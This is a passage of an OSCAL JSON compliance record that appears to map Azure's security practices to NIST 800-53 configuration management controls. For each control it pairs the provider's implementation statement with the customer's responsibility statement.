If there are any issues during the rollout, the deployment is halted to investigate."}],"responsibilities":[{"uuid":"4c24b8e6-cc0e-405f-a327-7fae969f8358","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for analyzing proposed changes to customer-deployed resources to determine potential security and privacy impacts prior to implementation.","provided-uuid":"fe7c7337-821c-4ebc-8a4b-41e30c5b252f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d9013964-0bf5-4b01-8c3c-039603b20016","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4.1","statements":[{"uuid":"a2e4fdc4-ac1c-4b1b-b8bd-c649c03cb31d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4.1_smt","by-components":[{"uuid":"654a3538-e3e1-46ea-b4be-29b0be629891","export":{"provided":[{"uuid":"88a891a2-c976-455d-86e8-df91f1be691b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"}],"description":"The Microsoft Security Development Lifecycle (SDL) process is followed for all engineering and development projects. The SDL process consists of five phases: Requirements, Design, Implementation, Verification and Release. The Requirements phase considers the foundational security, privacy, and cost requirements for a given product. 
The Design phase is the creation of the plan to implement the product to meet the defined requirements, including risk and threat model analysis. The Implementation phase is when security documentation is created for the product, allowing users and customers to make informed decisions on how to deploy it, as well as initial testing to remove any security or privacy issues. The Verification phase is when the implementation is reviewed to ensure that it meets the security and privacy tenets defined in the Requirements phase, and when full product testing takes place. Finally, the Release phase is the creation of incident planning, should any issues regarding the product arise once it is available._x000D_ _x000D_ Each service team tests proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. Azure implements safe deployment known as Safe Deployment Practices (SDP), which includes testing in canary regions and rolling out to increasing percentages of the applicable environment before considering the rollout complete. Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. Health indicators from these tests determine whether recently deployed software is propagated to more assets or rolled back. 
If there are any issues during the rollout, the deployment is halted to investigate._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c4f068ff-c95c-4ab0-b7ed-e0cea2b6756c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"}],"description":"The customer is responsible for analyzing proposed changes to customer-deployed resources in a test environment before implementation in an operational environment to identify security impacts due to flaws, weaknesses, incompatibility, or intentional malice.","provided-uuid":"88a891a2-c976-455d-86e8-df91f1be691b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a868b012-c821-4205-be8a-1e009fac1d4b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4.2","statements":[{"uuid":"d9e22376-8aeb-44a6-82d7-179dccc88f88","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4.2_smt","by-components":[{"uuid":"7126980a-5a71-4937-9435-61653dabeab7","export":{"provided":[{"uuid":"0e7a830c-123c-4871-b98e-eac370fdb74f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"}],"description":"Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. 
Health indicators from these tests determine whether recently deployed software is propagated to more assets or rolled back. If there are any issues during the rollout, the deployment is halted to investigate. Azure also performs periodic audits of the security functions to confirm their operating effectiveness via ASM."}],"responsibilities":[{"uuid":"f0f5f041-c08c-4e04-8f36-b8245f0dde65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"}],"description":"After the information system is changed, the customer is responsible for checking the security functions to verify that the functions are implemented correctly, operating as intended, and producing the desired outcome with regard to meeting the security and privacy requirements for the system.","provided-uuid":"0e7a830c-123c-4871-b98e-eac370fdb74f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c72fb5d4-685c-4c94-9b12-c601edf5d1aa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5","statements":[{"uuid":"a3c367ca-dbf5-49f5-adfc-3f9fa5e64b32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5_smt","by-components":[{"uuid":"c8d6727a-f4b1-4cfe-8c6b-763643656655","export":{"provided":[{"uuid":"2b962600-1692-4bf5-a9ce-70fba5d47eaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"}],"description":"Azure service teams define, document, 
approve, and enforce logical access restrictions associated with changes by using role-based access control (RBAC) enforced by Active Directory (AD). All accounts created in support of Azure are role-based. Service team personnel request access to, and if approved, are placed in the appropriate security groups according to their roles for supporting the system and using the principles of least privilege.\n\nAccess to the production environment is only allowed to members of specific security groups after approval. A subset of service team personnel has gone through the approval process for read-only access to production, used during critical incident escalations. Segregation of duties is established on critical functions within the Azure production environment, to minimize the risk of unauthorized changes to production systems.\n\nAccess to make changes to the production environment is limited to authorized members in the service teams. Temporary elevated access to the production environment via JIT by other teams may be granted for specific issue handling or troubleshooting purposes.\n\nTo support segregation of duties and prevent unauthorized changes to production, Azure implements segregated environments. Development and testing responsibilities for new software builds or changes to existing software are segregated and managed through restricted access to branches within Azure DevOps and segregated development and test environments. Features and changes are developed by the service teams, reviewed by designated service team members and tested by the service team members for quality assurance and compatibility with the rest of the platform.\n\nAzure maintains logical and physical separation between the development, test, and production environments. The development, test and production environments run on different clusters in separate network segments. 
Test and production clusters reside in separate network segments, which are accessed through distinct test and production Jumpboxes, Debug servers, and Network Hop Boxes. Access to test and production Jumpboxes, Debug servers, and Network Hop Boxes is restricted to authorized personnel.\n\nTransfer of software to the production environment is controlled by a version control system (VCS). Deployment of software bits to production is controlled through approvals and on qualifying production entry criteria. Production deployments use approved software builds and images, and do not contain development tools and utilities. The test data resides in a segregated environment with access restricted to authorized individuals based on job responsibilities. Production data is not used for testing purposes in a way that affects customer service.\n\nPhysical access to servers and network devices is restricted to authorized personnel through the physical access protections in place at the datacenters and Government Cloud Collaboration Centers (GC3s).\n\nPrivileged Access Workstation (PAW)\n\nThe Azure environment has additional logical restrictions such as requiring two separate accounts for users who wish to access a PAW and perform administration or implement changes within the environment."}],"responsibilities":[{"uuid":"e0239e39-6ec3-4788-b617-86045631787b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"}],"description":"The customer is responsible for enforcing logical access restrictions when making changes to customer-deployed resources.","provided-uuid":"2b962600-1692-4bf5-a9ce-70fba5d47eaf"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a093050c-f5ad-496c-ac0f-2d061a264881","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5.1","statements":[{"uuid":"86f966d7-33aa-4e7d-a332-dfffe79907ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.1_smt","by-components":[{"uuid":"f11b470a-87b9-4015-843a-1e9740c5d16b","export":{"provided":[{"uuid":"2458c1a2-3bd6-4f5d-9347-9954ffe59176","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"}],"description":"Servers and Services\n\nService teams use Active Directory (AD) and JIT to control access to change functions. AD defines the access that is available, and JIT provides time-limited permission elevation when users need to use that access. AD and JIT are automated, and actions taken, including account creation, change, disabling, removal for AD and account elevation for JIT, are automatically audited.\n\nNetwork Devices\n\nAccess restrictions are enforced via logical access security group restrictions. AD employs group membership, which requires security group owners to grant access to a given security group. AAA is integrated with a domain taxonomy of groups and users in AD. 
Both AD and AAA are supported via auditing mechanisms, which are captured via C+AI Security's event collection environment."}],"responsibilities":[{"uuid":"5faf142b-1291-49d5-92b1-31f327bc731b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"}],"description":"The customer is responsible for enforcing and auditing the access restrictions defined in CM-05.","provided-uuid":"2458c1a2-3bd6-4f5d-9347-9954ffe59176"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b2c162d9-6068-49b8-908f-77b9ea0b574b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5.5","statements":[{"uuid":"bea498a8-cc1a-438c-bd87-0189532222f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.5_smt.a","by-components":[{"uuid":"96b57dc7-6c69-4b31-981c-6a3260250a2b","export":{"provided":[{"uuid":"618aecb1-a126-4472-810f-04fe6734f6c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"}],"description":"Azure personnel do not have access to any of the Azure production environments to change hardware, software, or firmware components. Developers and integrators are responsible for developing the code, generating the builds, performing integration testing, and managing deployments. 
Azure limits privileges to release software and configuration changes to production to authorized personnel; only the designated approvers such as leads, managers, or PMs can approve changes to production, and the service teams deploy the changes using the DevOps model.\n\nSegregation of duties is established on all critical functions within Azure's production environment, to minimize the risk of unauthorized changes to production systems. As such, access to make changes to the production environment is limited to authorized service team members using the DevOps model.\n\nDatacenter Services (DCS) Operations is responsible for managing physical access to the Azure environment. Physical access to the production environment is restricted to DCS personnel, who perform hardware changes."}],"responsibilities":[{"uuid":"0f215221-a984-4693-aeae-130c7e3e0a7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"}],"description":"The customer is responsible for limiting privileges to make changes within customer-deployed production or operational environments.","provided-uuid":"618aecb1-a126-4472-810f-04fe6734f6c9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9a83f4ff-3e55-4180-b19d-e99966b1b504","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.5_smt.b","by-components":[{"uuid":"9d318409-91dc-4cfc-a0cf-3ebfd61b379f","export":{"provided":[{"uuid":"b7a88236-6e41-4c91-9bcf-77847337fc66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"}],"description":"Azure service teams review access at least quarterly, consistent with normal account review processes. Access to servers and network devices is reviewed for appropriateness on a quarterly basis through review of access levels for physical access."}],"responsibilities":[{"uuid":"1babde2a-5b47-499f-bfaa-10fbadd0e955","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"}],"description":"The customer is responsible for reviewing and reevaluating privileges defined in CM-05(05).a.","provided-uuid":"b7a88236-6e41-4c91-9bcf-77847337fc66"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e09205c3-e9ad-4e3c-ac9c-3c323fea6e18","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6","statements":[{"uuid":"b2054bda-f088-48c4-9f70-0dfaa73ede1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.a","by-components":[{"uuid":"af45c1d1-b0eb-46b9-8051-c819583a75e0","export":{"provided":[{"uuid":"51da7390-d29b-410b-8a21-844008b49689","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"}],"description":"Servers and Secure Admin Workstations (SAWs)\n\nMicrosoft establishes custom configuration baselines and configuration settings for its server assets. 
To establish these configuration settings, Microsoft examines and ingests a variety of sources:\n* Product architecture\n* Security analysis and principles, such as least functionality, least privilege, authorization and access control, auditing, network security, and operating system hardening\n* Microsoft Solution Accelerators Security Compliance Manager reference library\n* Vulnerability library knowledge bases\n* The United States Government Configuration Baseline (USGCB)\n* National Institute of Standards and Technology (NIST) recommendations\n* National Security Agency (NSA) recommendations\n* Defense Information Systems Agency (DISA) Security Technical Implementation Guides (STIGs)\n* Center for Internet Security (CIS) benchmarks\n\nMicrosoft works closely with CIS, DoD, NIST, and other regulators to establish the configuration settings and works with CIS as a participant during benchmark establishment. The configuration settings are primarily based on the CIS benchmarks and DISA STIGs, modified to address the unique operating environment of Azure. By evaluating and incorporating the best practices, guidance, and testing, Microsoft ensures a secure defense-in-depth deployment of technologies. The industry standards and input from baseline experts across Microsoft along with the environment-specific considerations and some role-specific settings (e.g. domain controller, workgroup server, domain joined server) are used to establish the configuration settings. The baseline for servers is published and made available to Microsoft personnel through the Azure DevOps source code repository, and a copy of the official baseline is published internally to the Liquid requirements catalog that is the authoritative source of requirements authored and maintained by Corporate, External and Legal Affairs (CELA) policy owners as well as other groups across Microsoft. The selected settings reflect the most restrictive, secure mode consistent with operational requirements. 
Microsoft ensures these settings can be scanned with traditional vulnerability scanners, enabling SCAP compliance on all applicable assets.\n\nNetwork Devices\n\nFor network devices, Azure Networking defines the approved configuration baselines based on industry best practices and recommendations from the hardware manufacturers, taking into consideration any applicable criteria listed in the Azure details above. These configuration baselines are then established as Gold images from which all network devices are deployed and configured. Network devices are scanned by the vulnerability management tool, which meets SCAP requirements."}],"responsibilities":[{"uuid":"efb7d41f-49d0-479b-bff6-de9b42ceaa1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing and documenting configuration settings for customer-deployed resources that reflect the most restrictive mode consistent with operational requirements.","provided-uuid":"51da7390-d29b-410b-8a21-844008b49689"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ea67f418-9471-4a7f-aae1-36d293dd1f13","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.b","by-components":[{"uuid":"e0098774-da31-4808-b72d-771f607b9b0c","export":{"provided":[{"uuid":"811047cf-dff2-4464-ba86-1d2213c185f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"}],"description":"Servers and Secure Admin Workstations (SAWs)\n\n
Mandatory configuration settings are implemented on each Azure asset as specified in the corresponding mandatory configuration baseline settings documentation for each component, which are established as described in Part a of this control. Azure service teams use Active Directory Group Policy Objects (GPOs) as an automated mechanism to centrally manage, apply, and verify security configuration settings. For virtual machines that are not domain-joined, Azure uses OS images that already have the appropriate settings configured prior to deployment.\n\nNetwork Devices\n\nUsing the Gold images, Azure Networking configures all network devices with the required settings prior to deployment. Config Policy Verifier (CPV) compares the current network configuration against the configuration baseline and creates the proposed remediation required for any deviations. The results are reviewed and prioritized on an ongoing basis, with major/critical items receiving priority remediation."}],"responsibilities":[{"uuid":"a33f67f6-8723-4b20-bf59-8c0ca46b326f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing the configuration settings defined in CM-06.a.","provided-uuid":"811047cf-dff2-4464-ba86-1d2213c185f0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e862107-dcc0-4b1c-9729-877435a945ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.c","by-components":[{"uuid":"3bf2cc83-e166-4667-a6e2-03f818f096c5","export":{"provided":[{"uuid":"00439f2d-5f43-4c3e-aecf-075ee3345b56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"}],"description":"Servers and Secure Admin Workstations (SAWs)\n\nThere are currently no exceptions to the mandatory configuration settings in Azure, as all Azure components are running one of the approved builds. In the case of an exception, the exception is documented through the One Compliance System (1CS) exception process. If there is a need to deviate from the standard configuration settings, the Azure System Owner is required to approve the documented operational necessity for this deviation. All configuration changes are limited to the specific service team members responsible for the component and are captured as part of the workflow for the change management process defined in the Azure change process.\n\nNetwork Devices\n\nExceptions may be discovered that require temporary deviation from the mandatory configuration settings to avoid impacting production services while the issue is resolved. In these situations, Azure Networking takes the following actions:\n* The issue is triaged and discussed by Azure Networking Operations and Azure Networking Engineering (including Azure Networking management), and a course of action is agreed upon and approved by this group.
\n* The issue is discussed in the daily Azure Networking Operations meeting for general awareness.\n* The relevant policy in Config Policy Verifier (CPV) is temporarily altered.\n* The issue is fixed. As an example, this might involve deploying a new code revision to the affected devices.\n* The relevant policy in CPV is restored, and the configuration testing against the baseline resumes as usual.\n\nACL Configuration Changes\n\nSecurity reviews are used by Azure and business groups to assess the security risks associated with non-standard operational implementations. Changes not expressly allowed by the Firewall and Tiered ACL guidelines (e.g. when an Azure team requests a non-standard change to configuration settings) are not allowed to be made to the Azure system's current configuration without a completed review. As an alternative to a quarterly review cycle, Azure performs these reviews in real time, prior to the implementation of the non-standard change (configuration changes that are not automatically approved within the Firewall and Tiered ACL Guidelines). To request a review, the requesting Azure team must populate a questionnaire, providing descriptions of the request, requirements, and justification for the change. Depending on the asset classification of data, descriptions may include data types, current compliance with data handling, and any risk assessment or threat analysis the Azure team has conducted in coordination with Privacy, CELA, or C+AI Security. The Azure team must also provide documentation to help the reviewing team (C+AI Security Solutions) assess operational risks (e.g. 
architecture and network diagrams, infrastructure threat models, etc.)."}],"responsibilities":[{"uuid":"6885330d-b6e9-48c8-b0ad-1b8d9b0689ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying, documenting, and approving any deviations from established configuration settings for customer-deployed resources.","provided-uuid":"00439f2d-5f43-4c3e-aecf-075ee3345b56"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"41196027-6a29-4907-ae6e-845cad78f70d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.d","by-components":[{"uuid":"a8d9c2c9-f88b-4efc-84c5-79a5fd1b6ad3","export":{"provided":[{"uuid":"1e7bfff9-bafd-4c7f-932e-2ca307d33ea3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"}],"description":"Servers and Secure Admin Workstations (SAWs)\n\nAll configuration changes are limited to the specific personnel responsible for the component and are captured in audit logs. In addition, vulnerability scans are run to assist in determining the effectiveness of the configuration settings on the applications and servers. Only certain individuals have the privileges to make changes to the configuration of the system based on an approved access model that requires establishing business justification for the membership. If an unauthorized person attempts to make changes, the system automatically denies the request. 
The action is captured in the audit logs and is investigated. If further action is required, it is reported up within Azure, and service team incident management personnel are notified immediately. The audit logs are maintained in storage for at least ninety (90) days to support after-the-fact investigations. Installed software is monitored using Azure Security Monitoring (ASM) and SCUBA. If unauthorized software installation is detected, the Security Response Team responds.\n\nNetwork Devices\n\nConfiguration baselines for network devices are incorporated as policies in Config Policy Verifier (CPV), which performs ongoing checks of all devices deployed on the network and reports deviations from standards. Upon discovering a deviation from the baseline, devices are corrected to ensure they agree with the current baseline."}],"responsibilities":[{"uuid":"ae90727c-3bca-40cd-9cd1-9bfe1da77d95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring and controlling changes to the configuration settings in accordance with organization policies and procedures.","provided-uuid":"1e7bfff9-bafd-4c7f-932e-2ca307d33ea3"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f0579771-eca1-4c85-8fe4-21bba58bc15e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6.1","statements":[{"uuid":"ca24e2cd-ca25-481f-bbf9-ca5c7b45d915","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6.1_smt","by-components":[{"uuid":"46e6e745-09c7-40a3-bad5-7611911e9788","export":{"provided":[{"uuid":"d8655e87-0a41-41b0-9024-ef3742de6192","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"}],"description":"Azure teams employ several tools to automatically manage, apply and verify configuration settings.\n\nServers\n\n# IPAK\n\nThe services running on Bare Metal and Pilotfish servers, including, but not limited to, Jumpboxes, Active Directory, Azure DNS, and other service teams, run standard Windows Server. The configuration baseline image for these assets is provided by the Imaging Production (IPAK) Engineering Team. The IPAK tool automates the installation of a standard set of applications, security fixes, and performance enhancements on Azure servers by providing a predictable and secure configuration in alignment with the Azure server baselines. Configuration baselines are developed by C+AI Security and then integrated into the IPAK for application to Azure servers. The IPAK is fully automatable or can be run manually, either locally on a single server, or remotely against many servers. 
The deployment of an IPAK includes the ability to access the summary log and preview status before and after an IPAK is deployed. IPAK logs are collected and can be previewed within the log collector tool, located on the IPAK site. This tool centrally manages and allows querying of log data for IPAK deployments.\n\n# RDOS\n\nThe RDOS team updates the server configuration baseline for Azure Host, Azure Native, and Azure Guest assets. The server base image is a version in which the kernel and many other core components have been modified to optimize them for the Azure environment. For service teams using Cloud Services, Windows server images are in the form of Virtual Hard Disks (VHDs) that are deployed as Guest VMs in the production environment. For Linux images, service teams use the Secure Base Image (SBI) that has been customized for secure configuration baselines relevant to Azure.\n\nNetwork Devices\n\nConfig Policy Verifier (CPV) centrally monitors network device configurations, including verification of configuration settings and application and management of them. Device configuration settings are compared against network device baselines in the form of Gold images to determine consistency across the environment.\n\nThe Configuration Management process runs daily on all Azure network devices, verifying the device configuration against Azure Networking standard policies. 
The Summary report notes the number of failures and the number of devices tested."}],"responsibilities":[{"uuid":"a8f28981-90c3-4d8e-953b-feef0cceefd6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"}],"description":"The customer is responsible for employing automated mechanisms to centrally manage, apply, and verify configuration settings for customer-deployed resources.","provided-uuid":"d8655e87-0a41-41b0-9024-ef3742de6192"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7c78a782-9828-4b8a-8fcd-b1e524045585","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6.2","statements":[{"uuid":"577ff8e5-5fb9-4f88-b9bb-c3e0f327b980","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6.2_smt","by-components":[{"uuid":"d1a311df-8881-46b4-a831-9e7560f78d23","export":{"provided":[{"uuid":"6e172955-deb0-400b-90a9-58fa56e6c648","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"}],"description":"Azure Security has developed a set of auditable events specific to Azure. In the event of changes to security-relevant configuration settings, Azure Security invokes the incident management process.\n\nIn addition to auditable events, Azure utilizes Azure Security Monitoring (ASM), which is SCAP compatible, to scan the environment for mandatory configuration changes. 
In the event of unauthorized changes to security-relevant configuration settings, Azure Security would invoke the incident management process. Each service team has a rotating list of members that are on call for response team efforts to investigate any unauthorized changes to security settings."}],"responsibilities":[{"uuid":"226e0614-644a-4f5a-a077-5d44a1d5d884","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"}],"description":"The customer is responsible for employing security safeguards to respond to unauthorized changes to configuration settings for customer-deployed resources.","provided-uuid":"6e172955-deb0-400b-90a9-58fa56e6c648"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a98f0ea7-7623-4cb0-9eb8-56c5c80874b3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7","statements":[{"uuid":"17e67bc9-53cc-48d7-aacc-b18561cda0e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7_smt.a","by-components":[{"uuid":"cd2530aa-2814-4513-8a37-c4b4e347570c","export":{"provided":[{"uuid":"983b3390-05be-4458-a0b7-43ee602037a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"}],"description":"Azure takes into consideration the USGCB, DISA STIGs, CIS 